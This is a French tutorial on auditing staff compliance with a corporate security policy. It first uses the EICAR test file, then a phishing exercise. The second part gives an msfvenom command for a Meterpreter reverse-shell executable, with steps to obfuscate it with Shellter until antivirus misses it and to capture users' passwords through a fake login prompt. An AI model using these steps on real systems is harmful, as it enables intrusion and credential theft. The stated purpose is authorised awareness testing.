Tester l’application de votre PSSI avec votre antivirus

Outre la vérification de mails chocoblast dans votre console Exchange, il peut être bon d’avoir un autre moyen pour vérifier qui applique ou non votre PSSI.

Dans notre cas nous utiliserons l’antivirus pour cela.

Methode 1: EICAR

Le fichier EICAR est un fichier inoffensif, mais qui est censé faire réagir l’antivirus.

Il faut juste créer un fichier texte comportant les caractères suivant :

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Intégrer ce fichier au sein d’une archive compressée et envoyée là a certains éléments de votre entreprise.
Le mieux étant de le noyer avec des fichiers légitimes (photos de l’entreprise, facture, etc.).

Dans le cas que j’ai eu à traiter, nous avions sélectionné le personnel que nous trouvions à risque (soit poste important, soit qui ne sent pas concerner par la sécurité informatique soit un personnel qui reçoit énormément de mails).

Voici le résultat sous Windows Defender :

Windows Defender détecte bien le fichier EICAR.

Voici le résultat sous Kaspersky Free :

Kaspersky détecte bien le fichier EICAR.

Et enfin, sous Clamwin :

ClamWin réagit aussi au fichier.

Cette solution a l’avantage de tester la réactivité de votre personnel.

Par exemple le temps mis par le personnel informatique a détecté l’alerte ou le temps mis par le personnel « infecté » pour signaler le fichier/mail.

En revanche, le personnel ciblé risque de ne pas voir le danger du fichier et de se sentir protéger par le système mis en place. Un coup à avoir comme réponse « Oui, mais bon, l’antivirus l’a vu donc on s’en fiche ».”.

Methode 2: Phising

Cette seconde méthode est bien plus longue à mettre en œuvre que la première. En revanche, elle aura un effet « choc » sur votre personnel, idéal pour lui faire prendre conscience des risques, mais je vous conseille fortement d’avoir l’accord de votre Direction avant la mise en place ainsi que de prévoir une réunion avec le personnel concerné suite à l’opération.

Nous utiliserons la distribution Kali qui contient les outils adéquats.

Création d’un fichier infecté

Exécuter la commande suivante:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

-a x86: architecture utilisée
LHOST : l’IP de votre machine sous Kali.
LPORT : le port qu’il faudra écouter.
attaque.exe : le nom de votre exécutable infectieux.

Obfuscation du code

Maintenant que notre fichier est créé, il faut le rendre indétectable par un antivirus.

Se rendre sur le site de Shellter et télécharger la dernière version :

Changer les droits du fichier :

Dézipper le fichier :

Exécuter le fichier shellter.exe :

Exécuter en mode “Auto” :

Dans “PE Target” sélectionner le fichier exe créé précédemment:

Activer le mode “furtif”:

Comme le fichier exe que nous avons utilise le reverse_tcp nous sélectionnons l’option 1.

Une fois fini vous devriez avoir cette fenêtre :

Le fichier est EN THÉORIE masqué vis-à-vis des antivirus, mais des essais réalisés, il m’a fallu le faire une trentaine de fois pour un obtenir un qui ne fasse pas repérer.

Infecter le poste

Maintenant que le fichier est créé et masqué, il reste à infecter la machine.

Dans notre cas nous poserons et exécuterons le fichier sur les postes clients, mais Kali fournit tout ce qu’il faut pour le masquer dans un PDF, dans un script vba pour un fichier Office infecté, sur une clef USB, etc. .

Pour la suite on considère que le client a reçu et exécuté le fichier.

Mettre en place l’écoute

Exécuter la commande msfconsole dans un terminal :

Configurer l’écoute :

La connexion est ok :

On met la session de côté :

Il faut noter le numéro de session, ici le 2.

On lance le phising via le processus lsaas.exe sur la session mise en attente :

L’utilisateur voit apparaitre sa fenêtre demandant un identifiant et mot de passe :

Une fois que l’utilisateur le saisi, vous obtenez le précieux sésame :

D’expérience, de nombreux utilisateurs saisissent leurs codes quand celui-ci est demandé, même s’il est 15 h 43 et qu’apparemment rien ne devrait le faire à ce moment-là.

Conclusion

On a là deux possibilités pour réaliser un audit du respect de votre PSSI. A vous de choisir la méthode qui vous plait le plus.